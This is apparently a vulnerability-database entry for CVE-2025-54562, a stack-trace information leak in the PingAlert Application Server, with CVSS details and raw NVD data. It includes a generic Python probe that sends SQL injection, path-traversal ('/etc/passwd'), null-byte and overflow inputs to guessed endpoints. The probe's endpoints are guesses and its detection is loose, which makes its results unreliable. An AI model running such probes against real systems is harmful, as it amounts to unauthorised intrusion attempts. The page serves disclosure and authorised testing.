Security Vulnerability Report
中文
CVE-2025-54562 CVSS 4.3 MEDIUM

CVE-2025-54562

Published: 2025-11-14 18:15:50
Last Modified: 2025-11-20 14:40:28
Source: [email protected]

Description

A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Technical Information to be Disclosed through stack trace.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54562 PoC - Desktop Alert PingAlert Stack Trace Information Disclosure # This PoC demonstrates how to trigger stack trace disclosure import requests import sys def test_cve_2025_54562(target_url): """ Test for CVE-2025-54562: Information Disclosure via Stack Trace Target: Desktop Alert PingAlert Application Server Versions: 6.1.0.11 to 6.1.1.2 """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-54562 PoC - Information Disclosure via Stack Trace\n") # Test cases to trigger stack trace test_payloads = [ # Malformed parameter values {"name": "Empty parameter", "data": {"id": ""}}, {"name": "SQL injection attempt", "data": {"id": "' OR '1'='1"}}, {"name": "Special characters", "data": {"id": "../../../../../etc/passwd"}}, {"name": "Numeric overflow", "data": {"id": "999999999999999999"}}, {"name": "Null byte injection", "data": {"id": "\x00test"}}, {"name": "Long string", "data": {"id": "A" * 10000}}, ] # Common endpoints that may be vulnerable endpoints = [ "/api/alert", "/api/ping", "/api/status", "/api/health", "/alert/status", "/ping/check" ] vulnerabilities_found = [] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint for payload in test_payloads: try: print(f"[*] Testing {payload['name']} on {endpoint}") # Send request with malformed data response = requests.post( url, json=payload['data'], headers={ "Content-Type": "application/json", "User-Agent": "CVE-2025-54562-PoC" }, timeout=10, verify=False ) # Check for stack trace indicators response_text = response.text.lower() stack_trace_indicators = [ "stack trace", "at line", ".java:", "exception in thread", "nullpointer", "null pointer", "arrayindexoutofbounds", "at com.", "at system.", "stacktrace", "exception", "error", "caused by:" ] matches = [ind for ind in stack_trace_indicators if ind in response_text] if len(matches) >= 3: # Multiple indicators suggest stack trace print(f"[!] VULNERABLE: {endpoint} - {payload['name']}") print(f"[!] Stack trace indicators found: {matches}") vulnerabilities_found.append({ "endpoint": endpoint, "payload": payload['name'], "indicators": matches, "status_code": response.status_code }) except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Summary print(f"\n[*] Scan complete") print(f"[*] Vulnerabilities found: {len(vulnerabilities_found)}") if vulnerabilities_found: print("\n[!] VULNERABLE ENDPOINTS:") for vuln in vulnerabilities_found: print(f" - {vuln['endpoint']} ({vuln['payload']})") return vulnerabilities_found if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-54562-poc.py <target_url>") print("Example: python cve-2025-54562-poc.py http://target.com:8080") sys.exit(1) target = sys.argv[1] test_cve_2025_54562(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54562", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.687", "lastModified": "2025-11-20T14:40:27.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Technical Information to be Disclosed through stack trace."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.5", "matchCriteriaId": "35DFA98A-F509-4F93-99A3-807C4B6548A2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54562/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.